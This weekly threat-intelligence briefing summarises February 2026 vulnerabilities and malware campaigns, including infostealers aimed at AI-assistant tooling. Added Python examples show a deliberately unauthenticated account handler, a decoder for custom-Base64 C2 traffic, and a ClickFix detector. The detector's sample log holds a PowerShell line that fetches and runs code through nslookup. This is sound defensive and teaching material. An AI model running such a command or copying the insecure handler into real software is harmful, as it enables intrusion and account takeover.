Weekly Threat Briefing
Diamond Trail

Cyware Weekly Threat Intelligence, February 16–20, 2026


The Good

  • INTERPOL's Operation Red Card 2.0 led to 651 arrests across 16 African countries, recovering over $4.3 million from online scams. It targeted high-yield investment scams, mobile money fraud, and fake loan applications. The operation uncovered schemes tied to over $45 million in losses, dismantled 1,442 malicious IPs, domains, and servers, and seized 2,341 devices. In Nigeria, a major investment fraud ring using phishing and fake crypto schemes was dismantled, shutting down over 1,000 social media accounts. Kenya arrested 27 suspects linked to fake investment offers, and Côte d’Ivoire detained 58 individuals tied to mobile loan scams.

The Bad

A wide-open digital door has been discovered in several Honeywell CCTV products, where a critical "no-authentication" flaw allows remote account hijacking. A massive security blind spot has been revealed in the VSCode ecosystem, where vulnerabilities in extensions like Code Runner and Live Preview have put millions of developers at risk. A malicious clone of the legitimate Triton macOS client has surfaced on GitHub, proving that even "open-source" isn't always open-and-shut.

  • A critical vulnerability, tracked as CVE-2026-1670, has been identified in multiple Honeywell CCTV products, allowing unauthorized access to camera feeds and potential account hijacking. Discovered by researcher Souvik Kanda, this flaw is classified as "missing authentication for critical function" and has a severity score of 9.8. It enables unauthenticated attackers to change the recovery email address associated with device accounts through an exposed API endpoint, facilitating account takeover. Affected models include several Honeywell CCTV cameras used in small to medium business environments and critical infrastructure settings. Although there had been no reports of public exploitation of this vulnerability as of February 17, CISA has issued a warning to raise awareness.
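The pattern behind the Honeywell flaw is CWE-306, a sensitive operation reachable without any proof of who is calling. The following is an added example written for this briefing, not Honeywell code and not a reconstruction of the actual CVE-2026-1670 endpoint: a minimal in-memory model of a recovery-email handler with the check missing, beside a hardened version. The request shape, the account store, the session store and the address validation rule are all assumptions.

```python
"""
Added example, not Honeywell firmware and not derived from the CVE-2026-1670
endpoint itself: a minimal in-memory model of the "missing authentication for
critical function" (CWE-306) pattern the advisory describes, shown beside a
hardened handler. Request shape, account store and session store are assumed.
"""
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass
class Account:
    username: str
    recovery_email: str


@dataclass
class Request:
    body: dict
    session_token: Optional[str] = None


def fresh_store():
    """Return a fresh (accounts, sessions) pair so each scenario starts clean."""
    accounts = {"admin": Account("admin", "owner@example.invalid")}
    sessions = {}  # token -> username
    return accounts, sessions


def issue_session(sessions: dict, username: str) -> str:
    """Stand-in for a real login: mint an unguessable token bound to one user."""
    token = secrets.token_urlsafe(32)
    sessions[token] = username
    return token


def vulnerable_set_recovery_email(accounts: dict, req: Request):
    """Before: the handler trusts the request body and never checks the caller."""
    acct = accounts.get(req.body.get("username", ""))
    if acct is None:
        return 404, "no such account"
    acct.recovery_email = req.body.get("recovery_email", "")
    return 200, "updated"


def hardened_set_recovery_email(accounts: dict, sessions: dict, req: Request):
    """After: a valid session is required and may only change its own account."""
    if not req.session_token:
        return 401, "authentication required"
    caller = sessions.get(req.session_token)
    if caller is None:
        return 401, "invalid session"
    if req.body.get("username", "") != caller:
        return 403, "cannot modify another account"
    new_email = req.body.get("recovery_email", "")
    if "@" not in new_email or len(new_email) > 254:  # assumed minimal validation
        return 400, "malformed address"
    accounts[caller].recovery_email = new_email
    # A real device would also audit-log this change and notify the old address.
    return 200, "updated"
```

The fix is two checks, not one: the caller must be authenticated, and the authenticated identity must own the account being modified. For an operation that can redirect account recovery, asking for the current password again and notifying the previous address are worth adding as well, so that an attempted takeover leaves a trace.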

  • Security researchers have documented a significant shift in the infostealer landscape with the first live attack targeting OpenClaw, an AI assistant known for its insecure default settings and plaintext storage of sensitive data. The infostealer employed a comprehensive file-grabbing routine, capturing critical files such as openclaw.json and device.json, which contained users' email addresses, cryptographic keys, and sensitive logs. This information allows attackers to impersonate users, bypass security checks, and gain unauthorized access to local OpenClaw instances. 

  • Recent vulnerabilities in widely used VSCode extensions, collectively downloaded over 128 million times, pose significant security risks to developers. Flaws affecting extensions like Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview could be exploited to steal local files and execute code remotely. Researchers identified these issues, including a critical vulnerability in the Live Server extension that allows file theft through malicious webpages. Additionally, the Code Runner vulnerability enables remote code execution via configuration changes. The Markdown Preview Enhanced extension is susceptible to executing JavaScript through crafted Markdown files. Despite attempts to notify maintainers since June 2025, no responses were received, leaving developers exposed to potential attacks that could lead to data exfiltration and system takeovers.

  • A Chinese state-backed hacking group, known as UNC6201, has been exploiting a critical zero-day vulnerability (CVE-2026-22769) in Dell RecoverPoint for Virtual Machines since mid-2024. This vulnerability, caused by hardcoded credentials, allows unauthorized remote access, enabling attackers to gain root-level persistence on affected systems. Once inside the network, UNC6201 deployed various malware, including a newly identified backdoor called Grimbolt, which is designed to be faster and harder to analyze than its predecessor, Brickstorm. The group has also employed advanced techniques, such as creating hidden network interfaces, referred to as "Ghost NICs," on VMware ESXi servers to navigate stealthily within victims' networks. Researchers have noted overlaps between UNC6201 and another Chinese threat cluster, UNC5221, which has targeted U.S. organizations in various sectors.

  • A malicious fork of the legitimate Triton macOS client for omg.lol has been discovered on GitHub, serving as a delivery mechanism for Windows malware. The attackers cloned the original project, rebranding it under the account “JaoAureliano” and embedding a trojanized ZIP file named Software_3.1.zip within misleading README content. This deceptive repository pressures users to download the malicious file while masking its true purpose. Despite appearing as a legitimate macOS application, the malware is designed for Windows systems and employs anti-analysis techniques to evade detection. 

  • A previously undocumented threat actor, potentially linked to Russian intelligence, has been attributed to malware attacks targeting Ukrainian organizations, particularly in defense, military, government, and energy sectors. This group has also shown interest in aerospace and manufacturing companies connected to military operations, as well as humanitarian organizations in Ukraine. Utilizing LLMs, the actor conducts reconnaissance and social engineering, enhancing their technical capabilities. Recent phishing campaigns involved impersonating legitimate Ukrainian energy entities and embedding CANFAIL malware within RAR archives disguised as PDF files. The CANFAIL malware executes a PowerShell script that downloads additional malicious components while displaying a fake error message to victims. This threat actor is also connected to the PhantomCaptcha campaign, which targets organizations involved in Ukraine's war relief efforts through deceptive phishing tactics.

New Threats

The CRESCENTHARVEST campaign weaponizes geopolitical tension by disguising data-stealing malware as urgent media files related to the ongoing protests in Iran. A new breed of cryptojacking is bypassing the browser to strike at the heart of the operating system by hiding within pirated software installers. The China-linked Iron Tiger (APT27) has ported its custom SysUpdate malware to Linux, disguising it as a persistent system service to maintain a silent foothold.

  • Cybersecurity researchers have uncovered a campaign named CRESCENTHARVEST, which appears to target supporters of the ongoing protests in Iran. This operation utilizes a RAT to facilitate information theft and long-term espionage. The attackers exploit recent geopolitical events to lure victims into opening malicious files disguised as protest-related images or videos. These files are bundled with authentic media and a Farsi-language report, enhancing their credibility. The attack begins with a malicious RAR archive that contains deceptive Windows shortcut files, which, when executed, deploy PowerShell code to retrieve additional malware. This malware extracts sensitive data, including browser credentials and system information, while communicating with a C2 server.

  • A newly discovered cryptojacking campaign exploits pirated software installers to facilitate a multi-stage infection aimed at maximizing Monero mining. This operation employs a customized XMRig miner and a controller component that ensures persistent access to infected systems. Unlike previous browser-based schemes, this campaign utilizes system-level malware, disguising itself as legitimate office productivity software to lure unsuspecting users. Once activated, the malware installs a primary controller named Explorer.exe, which orchestrates various functions based on command-line inputs, allowing it to install or remove components as needed. Notably, the campaign leverages a vulnerable signed driver, WinRing0x64.sys, to gain kernel-level access, enhancing mining performance significantly. 

  • A new SmartLoader campaign has emerged, utilizing a trojanized version of the Oura MCP server to deploy the StealC infostealer. Cybercriminals cloned the legitimate Oura MCP server, which connects AI assistants to health data, and constructed a deceptive network of fake GitHub accounts and repositories to establish credibility. This method allowed them to distribute a malicious payload disguised as a legitimate server. Once downloaded, the trojan executes an obfuscated Lua script that installs SmartLoader, which subsequently deploys StealC to steal sensitive information such as credentials and cryptocurrency wallet data. 

  • A new variant of SysUpdate malware, linked to the APT27/Iron Tiger group, has been identified targeting Linux systems. Initially detected on a client’s machine, this malware functions as a system service and executes commands like the GNU/Linux id command. It is a packed ELF64 binary, dynamically linked, and employs an unknown obfuscated packer, complicating static analysis. The malware communicates with its command-and-control servers using encrypted traffic across multiple protocols. Researchers revealed that the malware's encryption routines are complex and require emulation to decrypt C2 traffic. 

  • OysterLoader, a multi-stage malware loader, has significantly evolved in early 2026, enhancing its C2 infrastructure and obfuscation methods. Initially reported in June 2024, this C++-based threat is linked to the Rhysida ransomware group and is often distributed through fraudulent websites that impersonate legitimate IT tools like PuTTY and WinSCP. The malware's infection process unfolds in four distinct stages, utilizing sophisticated techniques to evade detection. It employs a custom LZMA decompression routine and dynamic API resolution, complicating static analysis. Recent updates to its C2 protocol feature a three-step communication process, with encoded JSON communications that use a non-standard Base64 alphabet, further obscuring its traffic.
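A non-standard Base64 alphabet defeats a plain `base64 -d` but is easy to undo once the alphabet is known. The following is an added analyst's helper, not code from Cyware, from any OysterLoader sample or from a vendor report: it maps a custom alphabet back onto the standard one and then parses the result as JSON. The alphabet used here is a constructed placeholder (the real OysterLoader alphabet is not on this page), and the sample beacon is constructed for the example.

```python
"""
Added example for the OysterLoader note: a decoder for Base64 that uses a
non-standard alphabet, written as an analyst's helper rather than taken from
any malware sample or write-up. The alphabet and the JSON beacon below are
constructed placeholders.
"""
import base64
import json
import string

STANDARD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
# Constructed placeholder: the standard alphabet rotated by 13 positions.
CUSTOM_ALPHABET = STANDARD_ALPHABET[13:] + STANDARD_ALPHABET[:13]


def _check_alphabet(alphabet: str) -> None:
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("a Base64 alphabet must be 64 distinct characters")


def decode_custom_b64(data: str, alphabet: str = CUSTOM_ALPHABET) -> bytes:
    """Translate the custom alphabet onto the standard one, then decode normally."""
    _check_alphabet(alphabet)
    normalised = data.translate(str.maketrans(alphabet, STANDARD_ALPHABET))
    # Custom encoders frequently drop padding; restore it before decoding.
    normalised += "=" * (-len(normalised) % 4)
    return base64.b64decode(normalised, validate=True)


def encode_custom_b64(raw: bytes, alphabet: str = CUSTOM_ALPHABET) -> str:
    """Inverse mapping, used here only to build a sample for the decoder."""
    _check_alphabet(alphabet)
    standard = base64.b64encode(raw).decode("ascii").rstrip("=")
    return standard.translate(str.maketrans(STANDARD_ALPHABET, alphabet))


def decode_json_beacon(encoded: str, alphabet: str = CUSTOM_ALPHABET) -> dict:
    """Decode a custom-Base64 blob and parse it as the JSON the write-up describes."""
    return json.loads(decode_custom_b64(encoded, alphabet).decode("utf-8"))


# Constructed sample beacon, produced with the placeholder alphabet above.
SAMPLE_BEACON = encode_custom_b64(b'{"id": "beacon-0001", "cmd": "ping"}')

if __name__ == "__main__":
    print("encoded:", SAMPLE_BEACON)
    print("decoded:", decode_json_beacon(SAMPLE_BEACON))
```

In practice the alphabet is recovered from the unpacked sample (it is usually a 64-byte string constant next to the encoding routine); once you have it, the same `str.maketrans` trick turns captured C2 traffic back into readable JSON without reimplementing Base64.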

  • A new variant of the ClickFix attack utilizes DNS queries to deliver malicious PowerShell payloads, marking a significant evolution in social engineering tactics. Victims are tricked into executing a custom `nslookup` command that queries an attacker-controlled DNS server. This command returns a response containing a PowerShell script, which is executed on the victim's device to install malware. The attack subsequently downloads additional malicious components, including a remote access trojan known as ModeloRAT, allowing attackers to control compromised systems. Unlike previous ClickFix methods that relied on HTTP for payload delivery, this technique blends in with normal DNS traffic, enabling attackers to modify payloads dynamically.
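Because the payload arrives over DNS, web proxy logs see nothing; the place to catch this variant is process-creation telemetry. The following is an added detection sketch written for this briefing, not code from Cyware or from any vendor write-up: it scans constructed process-creation log lines for `nslookup` invocations that request TXT records from a resolver outside the organisation's own and that are chained into PowerShell. The log layout, the trusted-resolver list and the two-trait threshold are all assumptions.

```python
"""
Added example for the DNS-delivered ClickFix variant: a heuristic scanner over
constructed process-creation log lines. Not code from Cyware or any vendor.
Log layout, trusted resolvers and the scoring threshold are assumptions.
"""
import re
from dataclasses import dataclass

# Assumed corporate resolvers; any other explicit server argument counts as external.
TRUSTED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}
POWERSHELL_NAMES = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}
EVAL_NAMES = {"iex", "invoke-expression"}
TXT_OPTION = re.compile(r"-(?:type|q|querytype)=txt")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample log lines in an assumed "timestamp|host|user|command line" layout.
SAMPLE_LOGS = [
    "2026-02-18T09:14:02Z|WS-042|alice|nslookup -type=txt update.example.invalid 10.0.0.53",
    '2026-02-18T09:15:40Z|WS-017|bob|powershell -ep bypass -c "nslookup -q=txt verify.example.invalid 203.0.113.7 | iex"',
    "2026-02-18T09:16:05Z|WS-017|bob|nslookup intranet.example.invalid",
    "2026-02-18T09:17:11Z|WS-099|carol|nslookup -type=TXT cfg.example.invalid 198.51.100.9",
]


@dataclass
class Finding:
    host: str
    user: str
    reasons: list
    cmdline: str


def analyse_cmdline(cmdline: str) -> list:
    """Return the suspicious traits present in one command line (empty if none)."""
    tokens = [t.strip("\"'") for t in cmdline.split()]
    lowered = [t.lower() for t in tokens]
    reasons = []
    if "nslookup" not in lowered:
        return reasons
    # Trait 1: the lookup asks for TXT records, the record type that can carry text.
    if any(TXT_OPTION.fullmatch(t) for t in lowered):
        reasons.append("txt-query")
    # Trait 2: an explicit server argument that is not one of our own resolvers.
    for tok in tokens[lowered.index("nslookup") + 1:]:
        if tok == "|":
            break
        if IPV4.fullmatch(tok) and tok not in TRUSTED_RESOLVERS:
            reasons.append("external-resolver")
            break
    # Trait 3: the DNS answer is handed straight to a PowerShell evaluator.
    if POWERSHELL_NAMES & set(lowered) and EVAL_NAMES & set(lowered):
        reasons.append("piped-to-powershell")
    return reasons


def scan_logs(lines, threshold: int = 2) -> list:
    """Flag a line when it shows at least `threshold` of the traits above."""
    findings = []
    for line in lines:
        _ts, host, user, cmdline = line.split("|", 3)
        reasons = analyse_cmdline(cmdline)
        if len(reasons) >= threshold:
            findings.append(Finding(host, user, reasons, cmdline))
    return findings


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"{f.host} {f.user}: {', '.join(f.reasons)} :: {f.cmdline}")
```

A single TXT lookup against the corporate resolver (the first sample line) is ordinary administrator behaviour and is left alone; the threshold fires only when the query also goes to an outside server or is fed into PowerShell. Pairing this with DNS-server logs that record unusually long TXT answers gives a second, independent signal for the same technique.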
